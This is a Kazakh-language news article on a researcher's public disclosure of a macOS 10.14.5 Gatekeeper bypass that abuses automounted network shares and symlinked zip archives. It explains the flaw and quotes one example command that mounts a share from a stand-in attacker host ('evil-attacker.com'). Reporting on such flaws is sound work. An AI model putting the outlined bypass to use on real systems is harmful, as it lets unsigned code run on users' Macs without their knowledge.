Амая Томан Қауіпсіздікті зерттеуші Филиппо Кавалларин өз блогында macOS 10.14.5 жүйесіндегі қате туралы ескерту жариялады. Бұл Gatekeeper қауіпсіздік шараларын толығымен айналып өту мүмкіндігінен тұрады. Каваллариннің айтуынша, ол осы жылдың ақпан айында Apple-ге қатені көрсеткен, бірақ компания оны соңғы жаңартуда түзетпеді.
Gatekeeper Apple әзірлеген және оның жұмыс үстелі операциялық жүйесіне алғаш рет 2012 жылы енгізілген. Бұл қолданбаның пайдаланушының білімі мен келісімінсіз жұмыс істеуіне жол бермейтін механизм. Қолданбаны жүктеп алғаннан кейін, Gatekeeper бағдарламалық құралға Apple тарапынан дұрыс қол қойылғанын білу үшін оның кодын автоматты түрде тексереді.
Болуы мүмкін сізді қызықтырады
Кавалларин өзінің блог жазбасында Gatekeeper әдепкі бойынша сыртқы жадты да, желілік бөлісуді де қауіпсіз орындар деп санайтынын айтады. Осы мақсаттарда тұратын кез келген қолданбаны қақпашы тексеруінен өтпей-ақ автоматты түрде іске қосуға болады. Дәл осы мүмкіндік зиянды бағдарламалық құралды пайдаланушының хабарынсыз іске қосу үшін пайдаланылуы мүмкін.
Рұқсат етілмеген қол жеткізуге мүмкіндік беретін аспект - пайдаланушыларға "/net/" арқылы басталатын жолды көрсету арқылы желілік үлесті автоматты түрде орнатуға мүмкіндік беретін автоматты орнату мүмкіндігі. Мысал ретінде, Cavallarin «ls /net/evil-attacker.com/sharedfolder/» жолын келтіреді, бұл операциялық жүйенің зиянды болуы мүмкін қашықтағы «sharefolder» қалтасының мазмұнын жүктеуге әкелуі мүмкін.
Қауіптің қалай жұмыс істейтінін бейнеден көруге болады:
Тағы бір фактор, егер automount функциясына апаратын белгілі бір символдық сілтемесі бар zip мұрағаты ортақ пайдаланылса, оны Gatekeeper тексермейді. Осылайша, жәбірленуші зиянды мұрағатты оңай жүктеп алып, оны аша алады, бұл шабуылдаушыға пайдаланушының хабарынсыз Mac жүйесінде іс жүзінде кез келген бағдарламалық құралды іске қосуға мүмкіндік береді. Әдепкі бойынша белгілі бір кеңейтімдерді жасыратын Finder де осы осалдықтың үлесіне ие.
Кавалларин өзінің блогында Apple компаниясы ағымдағы жылдың 22 ақпанында macOS операциялық жүйесінің осалдығына назар аударғанын айтады. Бірақ мамыр айының ортасында Apple компаниясы Кавалларинмен байланысын тоқтатты, сондықтан Кавалларин бәрін көпшілікке жария етуді шешті.
Дерек көзі: FCVL
